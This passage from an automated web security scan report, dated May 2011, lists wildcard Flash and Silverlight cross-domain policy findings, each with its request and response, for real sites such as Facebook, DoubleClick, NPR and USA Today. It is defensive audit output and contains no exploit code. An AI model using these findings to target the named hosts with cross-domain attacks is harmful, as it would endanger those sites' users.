   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

3.68. http://optimized-by.rubiconproject.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:58 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Tue, 12 Apr 2011 23:18:01 GMT
Accept-Ranges: bytes
Content-Length: 223
_eep-Alive: timeout=5, max=5
_onnection: Keep-Alive
Content-Type: application/xml
Via: CN-5000
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...

3.69. http://pagead2.googlesyndication.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Mon, 09 May 2011 05:11:30 GMT
Expires: Tue, 10 May 2011 05:11:30 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 37413
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

3.70. http://pubads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Mon, 09 May 2011 04:11:58 GMT
Expires: Tue, 10 May 2011 04:11:58 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 40983
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

3.71. http://rd.meebo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://rd.meebo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: rd.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 09 May 2011 15:35:01 GMT
Content-Type: text/xml; charset=utf8
Content-Length: 91
Last-Modified: Wed, 26 Jan 2011 19:56:05 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
   <allow-access-from domain="*.meebo.com"/>
</cross-domain-policy>

3.72. http://share.meebo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://share.meebo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: share.meebo.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 05 May 2010 22:56:50 GMT
ETag: "2211755815"
Content-Type: text/xml
Server: lighttpd/1.4.19
Cache-Control: max-age=604800
Expires: Mon, 16 May 2011 15:35:31 GMT
Date: Mon, 09 May 2011 15:35:31 GMT
Content-Length: 155
Connection: close

<cross-domain-policy>
<allow-access-from domain="*.meebo.com"/>
<allow-http-request-headers-from domain="*.meebo.com" headers="*"/>
</cross-domain-policy>

3.73. http://static.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.138.64.186
Date: Mon, 09 May 2011 15:35:53 GMT
Content-Length: 1473
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

3.74. http://syndication.mmismm.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://syndication.mmismm.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: syndication.mmismm.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:02 GMT
Server: Apache
Last-Modified: Fri, 22 Apr 2011 21:27:32 GMT
ETag: "10e-4a188868f3900"
Accept-Ranges: bytes
Content-Length: 270
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.adap.tv"/>
...[SNIP]...

3.75. http://videos.usatoday.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://videos.usatoday.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: videos.usatoday.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "f3c5e455d9c4b849b778a0a303fe299c:1267469702"
Last-Modified: Mon, 01 Mar 2010 18:55:02 GMT
Accept-Ranges: bytes
Content-Length: 465
Content-Type: application/xml
Date: Mon, 09 May 2011 15:38:54 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<!-- Note: secure=false is confusing, but basically its saying
to allow SSL connections. Their reasoning is something
abo
...[SNIP]...
<allow-access-from domain="*.brightcove.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.tv" secure="false" />
...[SNIP]...

3.76. http://www.collegesurfing.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.collegesurfing.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.collegesurfing.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:10 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Aug 2007 11:26:03 GMT
ETag: "219006d-c7-438d4dadd48c0"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml
Set-Cookie: BIGipServerwww.collegesurfing.com=1006764042.20480.0000; path=/

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.virtualcollegeadvisor.com" />
<allow-access-from domain="*.virtualcollegeadvisor.net" />
</cross-domain-policy>

3.77. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.54.111.43
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

3.78. http://www.meebo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.meebo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 09 May 2011 15:35:02 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 303
Last-Modified: Thu, 28 Apr 2011 16:54:16 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="www.meebo.com"/>
<allow-access-from domain="*.meebo.com"/>
<allow-access-from domain="meebo.com"/>
<allow-access-from domain="*.meebome.com"/>
<allow-access-from domain="www.meebome.com"/>
<allow-access-from domain="meebome.com"/>
...[SNIP]...

3.79. http://www.npr.org/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.npr.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.npr.org

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:46 GMT
Server: Apache/2.2.14 (Unix)
Last-Modified: Thu, 07 Apr 2011 20:17:23 GMT
Accept-Ranges: bytes
Content-Length: 455
Cache-Control: max-age=600
Expires: Mon, 09 May 2011 15:49:46 GMT
Keep-Alive: timeout=10, max=4945
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.threespot.com"/>
   <allow-access-from domain="*.npr.org" />
   <allow-access-from domain="*.digitaria.com"/>
   <allow-access-from domain="www.kqed.org" />
   <allow-access-from domain="*.iheartnpr.org" />
   <allow-access-from domain="apps.facebook.com" />
...[SNIP]...

3.80. http://www.usatoday.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:44 GMT
Accept-Ranges: bytes
ETag: "befaf11117e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:36:43 GMT
Connection: close
Content-Length: 1558

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="projects.usatoday.com"/>
   <allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

3.81. http://api.twitter.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:41 GMT
Server: hi
Status: 200 OK
Last-Modified: Wed, 04 May 2011 17:32:26 GMT
Content-Type: application/xml
Content-Length: 561
Set-Cookie: k=173.193.214.243.1304955581869571; path=/; expires=Mon, 16-May-11 15:39:41 GMT; domain=.twitter.com
Cache-Control: max-age=1800
Expires: Mon, 09 May 2011 16:09:41 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

4. Silverlight cross-domain policy
There are 16 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://ad.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Mon, 09 May 2011 15:35:02 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

4.2. http://ads.pointroll.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:11e6"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Mon, 09 May 2011 15:35:08 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

4.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Tue, 10 May 2011 15:34:58 GMT
Date: Mon, 09 May 2011 15:34:58 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

4.4. http://b.voicefive.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Tue, 10 May 2011 15:35:23 GMT
Date: Mon, 09 May 2011 15:35:23 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

4.5. http://content.usatoday.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:59:11 GMT
Accept-Ranges: bytes
ETag: "80d976d8f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:38:09 GMT
Connection: close
Content-Length: 730

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
               <domain uri="*"/>

...[SNIP]...

4.6. http://contextweb.usatoday.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://contextweb.usatoday.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: contextweb.usatoday.net

Response

